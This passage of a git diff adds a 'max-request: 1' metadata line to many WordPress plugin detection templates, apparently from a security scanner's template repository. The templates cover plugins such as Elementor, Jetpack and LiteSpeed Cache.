     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
+    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
